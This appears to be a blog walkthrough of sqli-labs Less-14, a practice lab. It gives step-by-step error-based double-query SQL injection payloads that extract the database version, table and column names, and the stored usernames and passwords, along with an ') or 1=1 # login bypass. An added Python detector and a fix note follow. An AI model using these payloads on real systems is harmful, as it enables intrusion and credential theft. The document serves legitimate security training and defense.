sqli-labs Less-14

Less-14 POST - Double Injection - Single quotes - String - with twist
This level differs from Less-13 only in how the string is closed; it is still solved with double injection, and the basic steps are the same.

0x01.

uname=1&passwd=1&submit=Submit
uname=1"&passwd=1&submit=Submit

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1" LIMIT 0,1' at line 1

The error message shows that the statement is closed with a double quote.

0x02. Get the database version, database name and user
uname=" union select 1,2 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

0x03. Get the table names
uname=" union select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema='security' limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit
To find the other tables, change the limit value.

0x04. Get the column names
uname=" union select count(*),concat((select concat(column_name,0x3a,0x3a) from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit

0x05. View the number of fields
uname=" union select count(*),concat((select concat(count(*),0x3a,0x3a) from security.users limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit

0x06. Get the column values
uname=" union select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit
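
A defender's view of the requests above, as an added example that is not part of the original post: a Python check that flags the duplicate-key error pattern used in every step (count(*), concat((select ...)), floor(rand(0)*2), group by) in urlencoded POST bodies, after normalizing case, whitespace and inline comments. The function names and the sample bodies are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Parts of the duplicate-key ("double query") error pattern used on this page.
SIGNATURE = {
    "rand_floor": re.compile(r"floor\(rand\(\d*\)\*2\)"),
    "count_star": re.compile(r"count\(\*\)"),
    "group_by": re.compile(r"groupby"),
    "concat_subquery": re.compile(r"concat\(\(?select"),
}
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)


def normalize(value):
    """Lower-case, drop /* */ comments and all whitespace, so that
    'FLOOR (RAND (0) * 2)' and 'floor(rand(0)*2)' compare equal."""
    return re.sub(r"\s+", "", INLINE_COMMENT.sub("", value.lower()))


def scan_body(body):
    """Return {field: [matched signature parts]} for one urlencoded POST body."""
    hits = {}
    for field, value in parse_qsl(body, keep_blank_values=True):
        flat = normalize(value)
        parts = [name for name, rx in SIGNATURE.items() if rx.search(flat)]
        # floor(rand()*2) together with GROUP BY is the core of the pattern;
        # requiring both keeps ordinary text from being flagged.
        if "rand_floor" in parts and "group_by" in parts:
            hits[field] = parts
    return hits


def scan_log(bodies):
    """Return (index, hits) for every body that carries the signature."""
    return [(i, h) for i, b in enumerate(bodies) if (h := scan_body(b))]


# Constructed sample POST bodies (not captured traffic).
SAMPLES = [
    "uname=admin&passwd=admin&submit=Submit",
    'uname=" union select count(*),concat((select version()),floor(rand(0)*2)) '
    "as a from information_schema.tables group by a # &passwd=1&submit=Submit",
    "uname=%22+UNION+SELECT+COUNT+(*),CONCAT+((SELECT+VERSION()),FLOOR+(RAND+(0)+*+2))"
    "+AS+a+FROM+information_schema.tables+GROUP+BY+a+%23&passwd=1&submit=Submit",
    "uname=bob&passwd=floor+plan+group+by+room&submit=Submit",
]

if __name__ == "__main__":
    for index, hits in scan_log(SAMPLES):
        print(index, hits)
```

The underlying fix on the application side is a parameterized query and a generic error page, since the technique depends on the MySQL error text being returned to the client.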


Origin blog.csdn.net/qq_42630215/article/details/105158038